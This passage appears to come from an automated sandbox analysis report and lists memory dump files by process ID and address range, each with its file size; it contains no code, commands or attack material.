                                                                                        • memory/3056-389-0x0000000004370000-0x00000000043EF000-memory.dmp

                                                                                          Filesize

                                                                                          508KB

                                                                                        • memory/3056-788-0x0000000000400000-0x000000000047E000-memory.dmp

                                                                                          Filesize

                                                                                          504KB

                                                                                        • memory/3100-181-0x0000000000400000-0x00000000004A2000-memory.dmp

                                                                                          Filesize

                                                                                          648KB

                                                                                        • memory/3100-179-0x0000000000400000-0x00000000004A2000-memory.dmp

                                                                                          Filesize

                                                                                          648KB

                                                                                        • memory/3116-314-0x0000000000630000-0x00000000006A4000-memory.dmp

                                                                                          Filesize

                                                                                          464KB

                                                                                        • memory/3116-787-0x0000000005200000-0x0000000005212000-memory.dmp

                                                                                          Filesize

                                                                                          72KB

                                                                                        • memory/3116-315-0x0000000005010000-0x000000000501A000-memory.dmp

                                                                                          Filesize

                                                                                          40KB

                                                                                        • memory/3116-1658-0x00000000065A0000-0x00000000065F4000-memory.dmp

                                                                                          Filesize

                                                                                          336KB

                                                                                        • memory/3544-251-0x00000000001C0000-0x00000000001D4000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/3756-6636-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                                          Filesize

                                                                                          124KB

                                                                                        • memory/3756-323-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                                          Filesize

                                                                                          124KB

                                                                                        • memory/3756-262-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                                          Filesize

                                                                                          124KB

                                                                                        • memory/4184-6348-0x00000233D5C80000-0x00000233D5CD6000-memory.dmp

                                                                                          Filesize

                                                                                          344KB

                                                                                        • memory/4184-2334-0x0000000000400000-0x00000000004CE000-memory.dmp

                                                                                          Filesize

                                                                                          824KB

                                                                                        • memory/4184-2336-0x00000233D42B0000-0x00000233D42B8000-memory.dmp

                                                                                          Filesize

                                                                                          32KB

                                                                                        • memory/4184-2337-0x00000233EE4D0000-0x00000233EE5DA000-memory.dmp

                                                                                          Filesize

                                                                                          1.0MB

                                                                                        • memory/4540-318-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                                          Filesize

                                                                                          64KB

                                                                                        • memory/4708-6551-0x0000024F7FEC0000-0x0000024F7FF72000-memory.dmp

                                                                                          Filesize

                                                                                          712KB

                                                                                        • memory/4708-6552-0x0000024F7FF80000-0x0000024F7FFF6000-memory.dmp

                                                                                          Filesize

                                                                                          472KB

                                                                                        • memory/4708-6550-0x0000024F67660000-0x0000024F676B8000-memory.dmp

                                                                                          Filesize

                                                                                          352KB

                                                                                        • memory/4708-6549-0x0000024F65920000-0x0000024F6592C000-memory.dmp

                                                                                          Filesize

                                                                                          48KB

                                                                                        • memory/4708-6554-0x0000024F676D0000-0x0000024F676EE000-memory.dmp

                                                                                          Filesize

                                                                                          120KB

                                                                                        • memory/4824-2214-0x00000000001A0000-0x00000000003E8000-memory.dmp

                                                                                          Filesize

                                                                                          2.3MB

                                                                                        • memory/4824-2312-0x00000000001A0000-0x00000000003E8000-memory.dmp

                                                                                          Filesize

                                                                                          2.3MB

                                                                                        • memory/4892-6437-0x0000000000400000-0x000000000066D000-memory.dmp

                                                                                          Filesize

                                                                                          2.4MB

                                                                                        • memory/4892-289-0x0000000000400000-0x000000000066D000-memory.dmp

                                                                                          Filesize

                                                                                          2.4MB

                                                                                        • memory/4912-198-0x0000000000F50000-0x0000000000F9E000-memory.dmp

                                                                                          Filesize

                                                                                          312KB

                                                                                        • memory/4936-6507-0x0000000000400000-0x00000000008BA000-memory.dmp

                                                                                          Filesize

                                                                                          4.7MB

                                                                                        • memory/4936-926-0x0000000010000000-0x000000001001C000-memory.dmp

                                                                                          Filesize

                                                                                          112KB

                                                                                        • memory/4936-901-0x0000000000400000-0x00000000008BA000-memory.dmp

                                                                                          Filesize

                                                                                          4.7MB

                                                                                        • memory/4936-2165-0x0000000000400000-0x00000000008BA000-memory.dmp

                                                                                          Filesize

                                                                                          4.7MB

                                                                                        • memory/5496-6469-0x0000000000F50000-0x000000000107E000-memory.dmp

                                                                                          Filesize

                                                                                          1.2MB

                                                                                        • memory/5496-6473-0x0000000000F50000-0x000000000107E000-memory.dmp

                                                                                          Filesize

                                                                                          1.2MB

                                                                                        • memory/5588-2181-0x0000000000400000-0x000000000044B000-memory.dmp

                                                                                          Filesize

                                                                                          300KB

                                                                                        • memory/5588-6621-0x0000000000400000-0x000000000044B000-memory.dmp

                                                                                          Filesize

                                                                                          300KB

                                                                                        • memory/5588-2445-0x0000000000400000-0x000000000044B000-memory.dmp

                                                                                          Filesize

                                                                                          300KB

                                                                                        • memory/5736-2147-0x00007FF6AA170000-0x00007FF6AA3A7000-memory.dmp

                                                                                          Filesize

                                                                                          2.2MB

                                                                                        • memory/5736-2156-0x00007FF6AA170000-0x00007FF6AA3A7000-memory.dmp

                                                                                          Filesize

                                                                                          2.2MB

                                                                                        • memory/5864-6463-0x0000000000EF0000-0x0000000001214000-memory.dmp

                                                                                          Filesize

                                                                                          3.1MB

                                                                                        • memory/5888-6399-0x0000000000CE0000-0x0000000000D88000-memory.dmp

                                                                                          Filesize

                                                                                          672KB

                                                                                        • memory/5888-6400-0x00000000089B0000-0x0000000008BE2000-memory.dmp

                                                                                          Filesize

                                                                                          2.2MB

                                                                                        • memory/5888-6421-0x0000000009FF0000-0x000000000A0BE000-memory.dmp

                                                                                          Filesize

                                                                                          824KB

                                                                                        • memory/5888-6401-0x0000000008EB0000-0x0000000008F06000-memory.dmp

                                                                                          Filesize

                                                                                          344KB

                                                                                        • memory/5888-6420-0x000000000B8E0000-0x000000000BC37000-memory.dmp

                                                                                          Filesize

                                                                                          3.3MB

                                                                                        • memory/6128-2287-0x0000000000180000-0x00000000001A0000-memory.dmp

                                                                                          Filesize

                                                                                          128KB